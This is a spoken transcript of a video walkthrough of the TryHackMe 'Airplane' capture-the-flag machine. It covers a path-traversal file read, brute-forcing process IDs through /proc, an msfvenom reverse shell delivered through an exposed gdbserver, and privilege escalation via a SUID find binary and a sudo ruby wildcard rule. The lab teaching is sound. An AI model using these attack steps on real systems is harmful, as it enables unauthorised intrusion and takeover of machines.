What's up, everybody? I'm Perumal Jagan. I'm happy to see you after a long time. And it's been a long time since I made a TryHackMe video. And today I came up with that. I wanted to end that drought. So I came up with a TryHackMe content. And in this video, I'm going to solve a capture the flag challenge. And we are going to solve a Linux machine. A Linux machine that hosts a web application. We are going to exploit that web app and gonna take control of the underlying machine, which is nothing but the Linux operating system. And without further ado, let's begin this. Now you are looking at the TryHackMe room. The TryHackMe room name is Airplane. You are seeing that right now. Are you ready to fly? And that's the tagline. Not much information on this room. It's a simple Linux machine, and I already started this machine. You see, I already got the IP address, and we have to gain the foothold, get the user flag, and escalate the privilege and get the root flag, and that will be our objective, right? We got the IP address, so let's connect to TryHackMe's network. So before that, I will initiate a tmux session. I call it as Airplane. All right. Okay. Sudo open VPN, and the file name is oexp3ru. Okay, fine. And I'm pressing the prefix key in tmux and C to create a new tab. Viewer C. You see I created a new tab and I'm in the tab. Fine. I connected to TryHackMe's network. Let me confirm that with ifconfig command. Yes, I'm able to reach. I'll ping the destination. Yeah, it's pinging, and you can see the TTL value. It says 60. So if it is 64 or less, then it should be a Linux operating system. In some cases, it could be Windows if there are a huge number of hops in between. Well, if there is a TTL value which is closer than 128, then you can assume it's a Windows operating system. So with this, we can actually infer what operating system we are up against. Okay, just an information. Fine, I created a directory for nmap scans to store the nmap scan results. So let me do the nmap scan, and before that I need to add the host entry. I already did this machine. Let me admit that. I want to showcase this machine as I found this was very interesting. Now I will change the host entry. Let's see host, and here the password. You can see this is the IP and the domain name is airplane.thm. You will get to know that in a while at the end of the nmap results. But before that, I'll just make the change. My keyboard is having some issues, so bear with that. See, it's keep deleting. Some delay I am experiencing. I don't know what exactly happening. Fine. Airplane.thm. Okay. 10.10.137.73. That's the IP. All right. Let me do the nmap scan first. I supposed to added the host entry after the nmap scan, but since I know the host name, I just added it before. -sc -sv -on store it in the nmap format. I'll name it as airplane. -sc to do with the default script. SV is to enumerate the version, and the next the IP address. All right. What else? -vv to enable the verbosity. It will also give the TTL value for every service. Okay. So this is the command I need to use, but I already used this because I already used it and I already grabbed the result. It will take some time, so I'll just showcase this results. Airplane. So now you are seeing the results. Let me pipe it to less. Yeah. I think Now it's fine. You can see there are 998 ports in total, and out of 998 closed ports, so we see two ports open here, port 22 and port 8000, a typical one. Port 22 SSH Ubuntu machine, 8000 Workzug 302 Python 380. So generally the Flask web applications get this kind of header. So it might be a Flask web application we are up against, and it is running on custom port 8000. All right. You can see it is redirecting to airplane.thm. So we already added the host entry. No problem. So we got only two ports open, so nothing else here. For the safer side, I need to initiate a full scan because by default Nmap only scans 1000 ports. I wanted to scan all the ports since I don't want to miss any of the stuffs. So for that, I'm just using -p- to scan all the ports, all 65535 TCP ports. I'm just using this -p- and what else? The IP address and -on to store it in Nmap format, and airplane full. I'll just name it like this. Okay, -vv to enable the verbosity in same manner. Okay, so this can also we can run. So I'll just, for the sake of demonstration, I try to run this scan at least. Okay, fine. While it is running, let's go and access the web application. Port 8000. So it automatically redirects us to the airplane.thm. You can see it looks like a boilerplate website. So nothing else, no links, nothing. So just looks like a static website. I just confirm it with Control U just to see the source code of the site, the front end development code, and you can see some bunch of text and some CSS decoration. Apart from that, nothing else is here. I don't see any sensitive info. They just described the aeroplanes. That's it. Fine. This looks fine now. Let me adjust my cam. Yeah, looks fine now. Now what to do? I'll go and turn on the burp suite. With that burp suite, I can intercept the web traffic and see what is the server request and response. Fine. I'll off the interceptor for now. I go to target and scope, and I add the web application URL. I also want to include the subdomain, because if I'm going to scan, if I'm going to enumerate any subdomain, then I don't want to add it once again. All right, I'll go here and change it to IP address. What is the IP address? I keep forgetting it. The IP address is, I think here it is, 10.10.137.73. Okay, I added this in scope, so I don't want to see the garbages here. Fine. Here I turn on the burp suite and reload this page. Hopefully I'll see this here in history. Yeah, I can see both request and response. I just send it to repeater. It says not modified. All I want to know is this server header. So it says Workzug 302 and also the Python 380. And yeah, I just wanted to show this. So by using this server header, we can infer what is the server we are up against. Okay, and next, I have some other way to showcase how to find the underlying web application framework, and you can simply do some inexistent, the path that does not exist, and you can copy that result. Let me copy it completely and go here, search in Google, and you can see the request URL found on the server. Then okay, this is the error, and you can see at the top it's a Python Flask application potentially. So in this way also you can try to guess the underlying web application framework. So if you know the web application framework beneath, then you can try to yeah, try to define the attack techniques accordingly. Fine. Now let me check that nmap scan, what happened there. So it's still happening. Says 17 more minutes. I'm not ready to waste. Okay, you can see straight off the bat, it says port 6048, which was not there in our initial scan. So it found port 6048. So this is what I wanted to show. I just cut this scan here, and port 6048. I just wanted to do the detailed scan on this port. 6048. Okay, and sorry, I have some mouse sensitivity issue, mouse and keyboard sensitivity issue, so that's why it's happening. It's not stopping at one point. I tried fixing it, but I couldn't fix it, unfortunately. I need to check that once I finish this. Fine. I'll go and scan with the default script and also the version enumeration. Fine. Okay. Let it scan. Meanwhile, yeah, I go here. Now you can see the URL bar. There is a URL. After that, they put question mark and also the parameter page. The page actually it is calling index.html. It's a separate file. So in this place, Python might be using a function like a render template. So render template is usually the function used in such cases. So we might be facing that function here. So if it is facing that function, then we can try to read the files arbitrarily. Okay. Yeah, like this render template. It will actually call. It is defining a function hello on root directory, and it is simply rendering the template index.html. So whenever you load the web server, it will simply load this HTML file. So that's what happening here as well, I suppose. So in order to confirm that, I need to find, is there any other files exist here? So to do that, what I can do, maybe I can try to do some directory enumeration. I'm gonna go and do this GoBuster. In GoBuster, there is a directory enumeration mode, and here I use the URL. Fine. I remove this stuff. Maybe, yeah, I remove this, and what else? Hyphen word list user share word list dirby common, and hyphen o to save the output. GoBuster.out. Okay, it's doing the scan. So while it is running, I'll just try to showcase this one. I don't know any other file name apart from this. Maybe I can simply load any login file. If there is any login file, it will show. There is no page like that. It says page not found. What is the error I am getting here? Control Shift I to see the developer tool. It says 404. Yeah, it's 404, not found. Fine enough. Now I'll do one thing. What if we are able to read the files that is owned by the operating system that is holding this web application? If this web application is poorly configured, then we will be able to read the files that belongs to its operating system. Okay, so let's try to do that. I'll just put the etc pass wd simply. It says page not found. I close this, and I'll just move one directory up. It still says page not found. Moving one more directory, it still says page not found. One more directory, it still says page not found. And one more directory, it is actually asking us to download a file, potentially the content of pass wd. let's confirm that. Okay, before that, we see port 6048 is holding a service called X11. All right, we keep it in mind. So let's go and check that content of etc pass wd. Yeah, as I expected. Oh, sorry. I think cat just pass wd because we are having that file, the downloaded file in the local directory. Yeah, now you are looking at the list of users. So this is the etc pass wd file belongs to the target. Okay, now simply I am filtering the users who are all having the shell access. Okay, grep sh dollar. So whatever the line that ends with sh, it will just bring it. I see only three users including root. The root user expected, Carlos and Hudson. So these are the three users. I mean, these are the two users. We want to get access to any of these two to check the privilege escalation vectors. Okay. So for that, we will need to enumerate. I mean, we need to enumerate the web application further because or the X11 service. So we need to check both of those services. So that's what we need to do. Here, I'm not doing any UDP scan because I knew there is nothing we get. We get nothing from the UDP scan. So that's why I'm not doing. But usually when you are taking up any challenge or any real assessment, do both TCP and UDP scan, and also scan all the ports, all 65535 ports of TCP and also all 65535 ports of UDP, so that you will not be missing anything. Okay. Take your time and do the scan. Enumeration is a very important stuff, because as long as you spend time in enumeration, you will not miss anything. So the chances of missing something will be very less. So that's what I want to say. Fine. Okay, now I found there is a file read vulnerability here. Okay, we're able to read the file, and I initiated a GoBuster. It gets nothing. I don't see anything. So no issues at all. We found a file read vulnerability, arbitrary file read. I'll try to read a shadow file. The story will be closed if we're able to read this, because there is no privilege. Since there is no privilege, it says internal server error, because the file is exist, but it is not allowing us to read the file. So that's why we're getting the internal server error. It has the status code of 500. Okay, fine. Now what else we could read? Maybe we can try to read the SSH key of every user, right? So we will try that. We go to a home directory and the user Hudson. First of all, I try to explain this this specific notation. So what exactly happened? So in Linux system, typically the web applications will be running from var www HTML, this location only. So whatever is the file you put here, so it will be displayed there in your browser, or someone who is accessing from outside. Okay, so this is the location. So when we are accessing from this location, we want to go back to the root file system. So for that, we simply use this notation and etc pass wd. Sorry, I need to use a different command. Blender. Yeah, now you can see how it actually functions. So what we did, we just used the same stuff and we tried to enumerate the passwd file on the target. Okay, I'm in the Hudson's home directory now, and the directory name would be SSH and authorized keys. I don't see, the page is not found, so there is no such files. And here I use the name Carlos. Still I'm getting the same stuff. I don't see any page, so there is no SSH key as well. So what else we could enumerate? I have another way. I mean, I have another idea, enumerating the process, the current process. Okay, so let's try to do that. Proc self. So if I put self, it will just check the current process. So That's what I'm trying to do. cmdline. So this is the command line, and if I use this specific, if I check the content of this specific path, it will give the command that is used to initiate to run this web application, this web service. Okay, that's what we are trying to get right now. It is asking me to download the file. Well, that's fine. I navigate to that airplane directory, and there I got that cmd line outcome. I can see Python 3 app.py. As I said, it's a Flask application. So it actually initiated with the Python 3. So it's a Python application, apparently. Fine. Now I got this. What else I could do? I found. I mean, I don't think any other file that we could read here. But we want to enumerate what is that 6048. Our scan result was showing it is service X11, right? Let me check that. -6048. It says service X11, but at the end it added a question mark, so it was not quite sure. So what we can do, I'm just using netcat to fetch the banner of this service and see 10.10.137.73 6048. It gives nothing. Just say the host name, and it says open, but nothing it gives. Fine. X11. I assume it has X11, and I try to check some pen testing solutions for this. X11 pen testing. Control. Okay. Here port 6000. I can use this script to determine whether it is really an X11 service. Otherwise, I can use a command like this to verify the connection. Let me do that. I think I have this tool. I do have. I simply copy this and the IP address that I tend to forget. And what else? Display ID they are asking. I don't know the display ID. I'm just using the same display ID that they mentioned. Unable to open display. 2. Let me verify the same with another tool. Xwin info. I have this tool. Yeah, I have this tool as well. And the IP is 137.73. I need to remember that. What else? How to use this? :0. Same, unable to display. So I suspect will it be an X11 service? I don't think so. So I want to know what service is exactly running on port 6048. Maybe I can detect that with this file read vulnerability. How to do that? Let me tell you that. There is a file in process. There is a file proc self net TCP. Okay, so let's see this. I need to remove this. Yeah, there is a file. It's asking us to download, so I'll download this. So let's open this file, cat TCP. You can see some bunch of data. What are these data? These data are nothing but the connections that are listening on the target machine. So that is being recorded in this specific path, the specific file TCP, proc self net TCP. Okay, it shows all the connection table. Okay, now let's see what is the interesting stuff here. We see local address, remote address, all these things. Did you notice this UID? Just nothing but the user ID. Okay, I can see user ID 0, which is nothing but root. Root user is always have that top user ID, and I can see the user ID 1001, which is a user created by someone, manually created user. Okay, fine. Now what I can do, I'll just try to grab this passwd file pipe grep ends with sh. I can see the user ID here in this etc passwd file. The user ID, the user Hudson has the user ID 1001. So Hudson is the user who runs all the services that are running, that are exposed to us, right? So let's see that. Yeah, I open this once again, and there are 3 services here. I'll check this 1F40. So let's see what is this. I mean, how this is represented. This is not looks like an IP address or port number, but I can say this is actually a hexadecimal representation. So this is how the connection table is represented in this process directory files. Okay, so let me confirm that. So here you can see port 0000, which is nothing but 0.0.0.0. That means that service is listening on all the interfaces, across all the interfaces. So we'll be able to access it from outside as well. So that's what it denotes. Okay, and I can see there is an interesting address. It starts with 017F. So let me explain that. 127.0.0.1. So this is the loopback address. I'm able to ping this, but if I try to ping its hexadecimal notation, 7F000001, I'm able to ping. You can see it's pinging the same loopback address because I'm pinging the hexadecimal address of that loopback. Okay, you can see 01 it begins with and ends with 7F, but here I'm starting with 7F and ending with 01 because of the endianness. I think it is using some little endian, I guess. So small endian or little endian, I forgot that. If it is using that endian, then you need to reverse that. You need to actually reverse the order. So that's how you need to read. Fine. I think you got that clearly. Now I'll try to take this one. Maybe I'll try to ping this. Let's see what happens. Ping. I'll just start typing it from the reverse order. 0A. Once again 0A. 8949. It is pinging 10.10.137.73, which is nothing but our machine IP address. Okay, so now you understood this, right? So this is how it stores. Now we can clearly see the user ID. The Hudson initiated 3 services. Among 3, I can see this one. So this is the port number. Let me check this port number 1F40. So I'll check this. Hexadecimal to decimal conversion, Control K, and here is the converter. I go here. What is the port number? Port hexadecimal representation. I mean hexadecimal port number 1F40. 1F40. It is not reversing because it is just a port number, just one number. Port 8000, our web application port. Okay, and what else? 1F40 we tested. 17A0. 17A0. Port 6048. So this is what we need to find, what service it is exactly. I mean, what service is running on port 6048 that we need to address. And what else? 1F40. What is that? I think the same stuff, right? Yeah, 1F40 is the same thing, port 8000. But we see also 22, right? I think someone initiated that as well. If we just check these things, then we will get to know which is port 22. Maybe I'll check this UID with 00160277. 0016 convert port 22. Yeah, this is the SSH which is initiated by root. Okay, fine. Now we got to know the port 6048. We only know the port number, but to read the command line of that process 6048, like we read the command line of our web application, we are able to read the command line of X11 service, that unknown service as well. But for that, we need to know the process ID, right? So here we added self because we enumerated our process itself. But in that unknown port case, we don't know the specific process ID. What we can do, maybe we may try to brute force this. How to brute force that? So let me check that. CMD line. So when I put CMD line here, it is asking us to download this CMD line. It is giving the outcome, it is giving the result. But when I use some port number here, it gives page not found. If the process ID is not exist, it gives page not found. If the process ID is exist, it will ask us to download, right? So we got the logic. Now what we are going to do, we are going to do a fuzzing function, a fuzzing program. We are going to write a Python program to fuzz this specific process ID, and what are all the process exist, it will just try to write its command line. Okay, I hope you got that point. So that's what we are planning to do right now. Okay, I'll go here, just zoom in a bit. I use code editor of maybe I'll use Sublime Text. I feel comfortable with that. I'll just use this one. Okay, Python. I think I need to install this. I already installed it. Okay, Control yes, or yeah. Okay, I give the name as bruteforcer.py. Fine. I import requests library. Okay, and URL. I do have the URL, so which is nothing but this one. What else? I go here and enter into a loop. Okay, how can I achieve this? Gosh. Okay, for okay, like this, for PID in range, I'm defining the range here. I'm just gonna define the process ID range between 0 or 1 and 1000. I'm just gonna check first 1000 process IDs. So for that, I'm gonna use between the range between 1 and 1000 colon and entering into that for loop. Okay, fine. And what I need to do now, the URL. Okay, I'll define this URL once again. URL, I want to put it in the F string so that I can just put a variable within this F string. And here I'm putting the variable name is PID. So we need to substitute this process ID whenever we brute force. So that's what I added here. And I need to remove this slash. It's not a path, it is a file. Okay, I can remove this, I guess. Fine. Now I'm calling that request library and sending the get request against that URL. Okay, and I am putting the results in a variable con. Sorry. Print con dot text. I think it will print the response page, the code of that response page. Let me test this. First of all, I will substitute self here. Okay, I'll substitute self and I'll press Control B in Sublime Text to execute that. And you can clearly see it says USR bin python 3 app.py because I added self here. So it will just print this line 1000 times because it is in the loop. Okay, now I stop this. Let me substitute this PID once again. it will substitute between 1 and 1000 and it will share the results. Fine. I'll run this once again. I got a result and I'm getting bunch of page not found errors. So I want to exclude this, right, somehow. How can I do that? Maybe I'll do this. I'll just if put it in a bracket, connection dot text not equal to page not found, not equal to page not found, print connection dot text. How about this? Now it will not show page not found. Instead, it will just print whatever the process that exists. I think it makes sense right now. Still, I would say it will take a lot of time because it is enumerating between 1 and 1000. Now, what I can do, since I already worked out this challenge, I'm just going to define a small range, maybe from 500 to 700. How about that? It's running. We are waiting for the outcome, and I can see modem manager, cups browsed, network manager, and look at this. This is what I wanted to see. User bin GDB server quad 0 6048, a service running on all the interfaces. It's exposed to all the interfaces, and it is something doing the airplane. Okay, now we got to know what is running on this GDB server. GDB is actually a debugger, no me debugger. I think that is how I need to pronounce it. A no me debugger, and we found this service. So now what we could do? Let's see how to exploit this, because we found there is a GDB server. Now when we Google this, we will automatically get the get a way to exploit it. GDB server pen testing. So I'm just searching Control K. The first one, the blog by Hacktricks, comprehensive one. And look at this. I think this will work. You can easily create ELF backdoor with MSF Venom, upload it and execute it. Okay, so this is how, this is what we need to do, I suppose. So we need to generate a payload. I think it is no longer required. We got what we wanted. I'll close this, and I just copy this command. Instead of copying, I just type this MSF Venom so that I can learn this, right? -p, a payload, Linux x64 shell reverse TCP. Linux x64 shell reverse, shell reverse TCP. Fine. L host is nothing but our host. So once it triggers, it has to send connection to our host, right? So let me grab this IP. Sorry, I'll paste this IP here. Fine. And L port, I keep 9001. I'm a huge fan of IPsec, so I'm using that. Prepend fork true. What does that mean? What does that mean? Okay. Control K, search. In MSF Venom, a detailed search. Prepend migrate is an option that allows user to link our session with ongoing process on target system. Well, here is a comprehensive answer. Fine. It's actually linking our ongoing our session with an existing process on the target. That's fine enough. And that's what we want, because we are just going to exploit GDB server, right? So this makes sense. And hyphen f elf, the file type is elf, and hyphen output, the output name. Hyphen f is elf, and hyphen o is what I can say, maybe exploit.elf. How about that? It's creating the payload. Let it create. So once it created, I need to modify its privilege. I need to make it as an executable, and I need to load it with GDB. So once I loaded it with GDB, I need to target the set remote debugger target, because GDB is a client actually. So by logging in, by accessing this client, we are just trying to reach the GDB server, which is nothing but our target. And we got our target IP and also the port on which it is running. Now we can simply use this command, I suppose. So just to, it will hook our current GDB session with the target server. That's what I think gonna happen. And also we are going to share the file, the exploit, to the target system through this debugger. That's awesome. So yeah, it's created now. I'll verify its file type. It's ELF file, little endian executable. Okay. And yeah, I'll go with the next one. chmod plus x exploit, done. And I'll load this with GDB. First of all, I'll check whether the GDBs exist or not. GDB, do I have it? I don't have. So no issues, I download that. Sudo apt search GDB. Lot of things. GNU debugger, fine. I'll install GDB -y. I'm installing this. So once it is done, I'll just execute this command in the debugger itself, because I'm opening the debugger with the binary as an argument, and I'm just setting the target to a remote host and pushing the file, the exploit, to the remote host, and setting that remote executable file and eventually running that executable file. So what will happen? That executable file that will be executed from the target environment. So when it executes, it will eventually trigger the shell to us if we are listening it on a proper port. Okay. Still happening, it's still going on. So let it happen. So once it is done, hopefully we will get some shell. Fingers crossed. Let's see. Still 20 seconds. Wow. Okay, I think what else? Can I show something else here? Self. I think I heard a command fd. File descriptor, maybe. I don't know what it contained. Page not found. So no use. And I also found one more stuff. CWD, current working directory or something. No, I think I forgot the path here. Net status. So let's see this status. Or it installed, and I'll just open my exploit with this GDB. Now I'm in GDB. All I need to do is just to copy and paste this command. Target extended remote IP : port. Target IP. Okay. Okay. Target extended remote target IP. And port. The port is 6048. Yeah. Remote debugging using the remote server. GDB server, because it is actually providing the debugging service. So we are just utilizing that service by using this target command. So that's what is currently happening. We could do next remote put binary and the destination binary. Fine. Let it finish. It will take some time. I remove this interceptor. Proc PID status. Okay, let me show this. Yeah. Okay, I think the debugger session is the debugging stuff is done. Let me show this status file meanwhile. Okay, sorry, bad command. Now I think you can see some interesting stuff. The name is Python 3 and the who is running this, you will get those details. User ID is 1001. The user is Hudson, so that person is running this. So we can also enumerate from this file proc self status. Okay, fine. Let's move on to the GDB. Fine. We are in that remote debugger now. I'll go and put the file. I'll push the file to the remote server. Remote put exploit.elf, that's the file name, and also I'm pushing it to the same location in the remote server. Hopefully we will get some error. Yes, we got permission denied. We don't have permission, but we knew we have permission to the home directory of Hudson, because Hudson is the user who is running this debugger process, GDB debugger, right? GDB server. So we are going to put this exploit on his path. Sorry for that, my keyboard is making some issue. It's creating ruckus. Home Hudson exploit.elf. Successfully sent file, because we had the write access on that home directory, because we knew it. No wonder. Fine. Now we send the file. Now all we need to do is to set it as executable file. I think that's what we are doing it. Set remote exec file home Hudson and exploit.elf. Okay, that looks cool. And sorry, run. So before I run, I need to make sure that I initiated a listener. nc -lvnp 9001. So that's the port I defined while creating the payload. So I run here and I go to the first tab, and here I need to get, I'll be getting the shell if I did everything correctly. It's debugging. Let me go to that. Now I can see. Now you can see the connection we received from the target. 1017 137.73. So that's our target. We received connection from the target. Who am I? Come on, tell me that you are Hudson. It's taking time. Who am I? Who am I? Who am I? No, it's not giving any outcome. Bash maybe. Python 3 -m http.server. Oh, sorry. Blender. I'm just trying to. I need to do this again. Tedious process. Yeah, I'll pause this video here and I'll try to redo this I reset the machine and I'll come back. All right, I'll do the same process now. I restarted I reset the machine. Now I got the session again. -zv IP address 6048. I got this right. I also added the host entry. You can see it's resolving. The IP address has changed right now. Okay, I'll go to the debugger. I already have this exploit.elf file. I'll do one thing. I'll open -lbnp. I think it is already listening, right? No? Yeah. Sorry. Here I'm going to listen on port 9000. Okay. I'll go to this and open the file exploit with gdb. I opened it. Now the next stuff is target extended remote IP address and the port 6048. Now it is remote debugging. The next thing is I need to put the file. Okay. Remote put source file name and the destination folder and the file name. Okay. Let it run. I need to learn a lot of low level stuffs. I need to learn debugging because this part is essential in malware analysis. When it comes reverse engineering, binary assessment, this is inevitable. Learning debugging is one of the valuable skills that you have. Yeah. Now we got the debugger. Now we set the remote session, and I use the command remote space put space exploit.elf and then the destination path. I already said we have write access on the Hudson's home directory. So let me use the same exploit.elf. Okay, remote put source binary, destination path and binary name. Okay, successfully sent the file. Everything is fine till now. Set remote. I think this is where I made the mistake last time. I didn't run exec. I didn't run the command remote, I suppose. Exec file and home Hudson exploit.elf. Set remote exec file home Hudson exploit.elf. Fine. We knew we already running the listener, so I just set this as well and I run. So when I run, hopefully I will get the shell. Starting program, reading that specific file on the target. We got the shell. Yeah, we got the shell. Cool. Who am I? Yeah, I'll wait. From remote target. Who am I? What? It says it's something reading from the remote target. Do I at least have a proper shell? Thank God. Actually, nothing happened. I was quite hurry. There was some delay to show the outcome. You can see. Um, I had to wait. I had to wait till it comes to this specific message. But I was hurry. I was trying to execute commands continuously, so it was missing. Yeah, now I can see it's Hudson, and I'll just try to stabilize this shell. Python -c import pty dot spawn bin bash. Okay, how about this? Yeah, perfect. And I press Control Z, stty ra minus echo, and foregrounding the process. Before that, I'll check the stty size 900. Okay, stty ra minus echo foreground. Perfect. And stty rows 9, stty calls 100. Okay, and export term equal to x term. Cool. Now we got stable shell, and we are Hudson right now, and I am in the opt directory by default, and you could see debugger is running from this path. And when we were running that Sublime text, that the program in Sublime text, we found it was running a program called Airplane. So it was trying to debug this specific program Airplane on by using the GDB debugger server. But since it was hosted in an insecure way, I was able to uh, just hook my binary into that debugger on the target, and I was able to get the shell. So let's see what this file is all about. Airplane. Okay, I run this Airplane file. Let's see what happens. It's a simple program, so just a simple useless Linux program. All right, home is not set. That's weird. I'll go to home directory, Hudson, and here you can see the exploit.elf, the file that we have pushed to Hudson's home directory. All right, cd desktop. Do I get flags here? I don't have any flags here. Maybe I need to navigate to, or I need to switch to user Carlos to get the flag, right? I think that's what I need to do. Okay, fine. Before that, I need to get the stable shell here, right? So for that, what I'm gonna do is to log in with SSH. So let me do that. I'll put a SSH key here. Maybe I'll create a directory .ssh. File exists. What? Yeah, it exists. .ssh lsfnla. Fine. I'll go to a tmux session. I mean my command line, and I create a directory www, and I navigate to the directory. Here I'll do start a Python web server. Before that, I need to generate the SSH key file, right? SSH keygen. What I can give, maybe Hudson. Yeah, Hudson is fine. Okay, now I need to copy this hudson.pub, the public key. So this is what I need to copy. I'll copy this. Okay, it's copied. I'll go here and SSH authorized keys, V, or I use nano. authorized keys. And here I'll just paste this. Sorry, that's the wrong clipboard. I need to exit this. What happened? No. Okay. Nano authorized keys. I'm entering once again, and I'm pasting the stuff that I copied here. All right, I'm writing it out. Authorized keys and exiting. Okay, fine. Cat authorized keys looks okay. I just change its permission to 600. And similarly, I'm going to my machine and modifying the privilege to 600. But I keep typing this hyphen. Hudson. Fine. Now I can simply SSH with Hudson's private key. Hudson at the rate IP address of the machine is 10.10.82.193. Cool. We got the stable shell. We logged in with SSH. All right. We don't have password of Hudson yet. It's asking for the password, so I can't check the sudo privilege of Hudson. What I could do? What else I could do? How can I escalate the privilege? In app directory, I found a weird file, I think on templates, maybe. Yeah, airplane.html, what it has. Maybe I'll try to access this with the web server. Airplane.html. URL was not found. Question mark page equal to this. Page not found. Templates. Once again, page with some CSS shenanigans. That's it. What else I could check? I need to go. I need to move to the user Carlos, but how can I achieve that? That's the question. Maybe I'll check the cron tab. Is there any automated tasks running? No cron tab. And I'll try to find the file that are set with SUID bit. Yeah. So let me check that. Find hyphen type the file hyphen perm u plus s. I think I'm searching it properly. U plus s dev null. To forward the garbages to dev null. Will it get me the list of files set with SUID bit? No. I think I need to tweak this a bit. $6,000. I'm making a mistake here. Yeah, I think it gives right now. Yeah, look at this. It's giving all these binaries. These are all the binaries set with SUID bit. Okay. So I want to filter just the binary that's set with usr bin, nothing else. So how can I do that? Pipe grep start with usr bin, correctly. Yeah, that's perfect. Well, I could see there are bunch of binaries, but I still don't know which one is a default one and which is a unique one, because I actually did this machine already, and I need to find which is the binary. For that, I'll try to. I think if I execute the same command in my machine, I will get the unique one. I can just compare the results and get the unique one. That's a nice idea. Go to 0. I think that's a VPN. I create a new one. Here, yeah, I execute the same command. Yeah. Some weird stuff happening with my keyboard. Look at this. Got the list of binaries. The first, it begins with CHAMGE. Let me check this. I think it's different. Let me check this one first. USR bin find, the find binary. I'll ls-la USR binary find, and here it is, Carlos. So it's owned by Carlos, so there definitely this is our Priv Esc vector. Even if I use linpiece, the privilege escalation script like linpiece, it will show the same stuff. And I used GTFO bins to search for find binary. Yeah, it is in GTFO bins, which means we can use it for some unexpected purpose. Find exec binary. Okay, this one I think. So let me take this one. I need to execute the find with some execution -exec, and I can call the shell with -p argument with that. And to escape this semicolon, I am using this backward slash, and I'm quitting this eventually. So I'm not using that quit. Instead, I just take this one. Okay, let me type this find dot exec. So when I execute this, when this binary is execute, it executes as Carlos. So that makes the difference. So when we are executing this binary, we are just calling the shell, right? So it will eventually give us the shell as Carlos. At least we are expecting that. -exec bin bash maybe -p and semicolon and escaping it with backward slash. Cool. I got a different shell. Let's see who am I. I'm Carlos right now. That's good. That's good. All right. I'll go to the second one. Do I still have that web server running? If not, let me go to this one and Python 3-m. I didn't even initiate the web server. Okay, now I have. Go to this and which Python 3, I think it is the same machine, right? What happened to me? -c import pty dot spawn bin bash. Out of pty devices. Fine. Okay, no issues. I'll go to home directory of Carlos and grab the flag. Yeah, it is there. I'll go here and echo and copying it to my system clipboard. Selection clipboard. Yeah, it's copied now. I go here, drop this flag. Yeah, that's done. And I'll go to this first one. Sorry. Yeah, here, and I'll check for the SSH path. It is there. It already exists. Okay. I'll go to this cat Hudson. I think it is in www. Cat Hudson.pub. I copy this. Okay. I go to this first shell and I put it in the authorized cd dot. Okay, we are already in SSH only. I use nano authorized keys. So all I'm trying to do is to obtain a stable shell for Carlos. Then we will think about the Priv Esc factor. Okay, it's wrong clipboard. Now I pasted, writing it. It's written chmod 600 and authorized keys. Fine. I go to the third one. And here, I think it's no longer needed. Okay, I need to go to www. Okay, I already changed this privilege. Okay, chmod -i Hudson. Okay, Carlos at the IP. Oh, Blender. I'm using the same Hudson's key to log in as Carlos. Fine, we got the stable shell for Carlos as well. Now let's see what is this. What is the privilege he has? Straightforward. So first of all, initially, whenever I'm getting into a Linux shell, I used to check this pseudo privilege, whether the user has pseudo privilege. Then if it is if they have a pseudo privilege, then it is a straightforward work. It's actually a low hanging fruit, hanging just above the ground. So that's the thing we need to do, and we can run a sudo command, Ruby. We can execute Ruby script with no password. I think this is our privilege escalation vector right now. So let's see how we can achieve this. I can see an asterisk, which is potentially a dangerous stuff to give in cron tab or with a pseudo privilege like this. Well, yeah, I think this is our previous factor. It's Ruby script. So let's see how to execute system command with Ruby. How to execute, I think it's a straightforward within system function. How to execute system commands with Ruby. Yeah, Control K. How to execute shell commands with Ruby. Yeah, it's straightforward. System, that's it. Okay, I'll do one thing now. I am currently in Carlos home directory. Now I'm going to exploit this specific stuff, or leverage this asterisk as best as I can. So let's see. It's very simple. I'm going to create a shell here itself. I create shell.rb, maybe not a shell, exploiter.ruby. Okay, I created a file, and I'm echoing a simple file, a simple shell command, bin bash. That's it. um, just dropping it into exploiter.rb. Okay, the file is ready right now, and I'm making it as executable plus x exploiter.rb. Okay, sudo -l. Okay, now what I'm trying to do is ruby, and I'm calling the root. So here it's mentioned it's a root directory, after that asterisk, so we can add anything instead of asterisk. So what I'm going to do, I'm going one path behind, going to the root directory and entering into the home directory. Fine. And going to Carlos directory, and here I got my script exploiter.rb. It ends with the extension rb. Fine enough. Let's see what happens. Most recent calls. Did I add that? I made a blunder. Sorry. Echo. This is a blunder mistake. I've been doing this for more than 1 hour, right? So I exhausted. Sorry for that. Echo system bin bash. Fine, right? And putting it into exploiter.rb. Now executing this command. Same stuff once again. Okay, I'll go and I use nano exploiter.rb. How to call the system command? Do I need to end it with a colon? Or the single quote might be creating the issue. Let's sort it out in a moment. Sudo. I supposed to use sudo. I forgot that. Yeah, we got that. Who am I? I'm root right now, and I don't see any exciting thing to look for in this beyond root part, because the web application was quite simple. So it was using the render template, and yeah, let me grab this root flag first. Cd root cat root.txt. Oh, sorry. I go here. Okay. Echo yeah, and pipe x clip hyphen selection clipboard. I need to fix this before I make the next video. It's creating a lot of shit. That's it, done. Let me show this the vulnerability. What caused this vulnerability? Etc. Sorry, not etc. Var dub. What else? Var dub HTML. It's a directory. I'm exhausted. That's why I'm doing this. Var dub HTML. I think the web application was ran by Hudson, right? So it was running from his home directory, not the typical web application directory. Yeah, it's there. Here it is. Cat app.py. Now let me explain what caused this issue really. I'll open it with .py, and you can see it's a Flask web app. It is using render template to bring a HTML file and show. You can see the route, the default route is actually moving to static path, and it is getting an argument page. You can see it appended in that. That was an argument, right? That was a parameter, and there is the OS path import, and this is actually causing the file read, the file that can be read from the underlying file system. So that's what causing it. And you can see there is no sanitization, there is no filter, nothing. It directly get the file input from the user, and it is showing the file to the user. So that's what caused the issue eventually. So with that issue, we found what is the service running on port 6048. Initially, we didn't know what service it was running, and eventually this file read vulnerability opened us the door to exploit that GDP server. So nothing much. So this is what this is all about this room. Yeah, this is all about this room. Hope you really enjoyed this. You really like this. I really stumbled upon creating this video because it's been a long time since I made a TryHackMe recording. Hopefully I'll learn from my mistakes, and I'll try to improve the video making skills, and also I'll try to reduce the mistakes when days passes. When I create more and more videos, it will obviously get reduced. That's it. I just wanted to say this. Hope you really enjoyed it. If you really did this, if you really liked it, do that YouTube algorithms. Do like, comment, subscribe, everything. I really appreciate your support. Thanks for your support. It really priceless. It means a lot to me. Thank you so much. I'll catch you next time with another exciting one. Until then, I'm signing off. Cheers, and I love you all. Thank you so much. Have a good one. I'll see you with the next one. Okay, bye.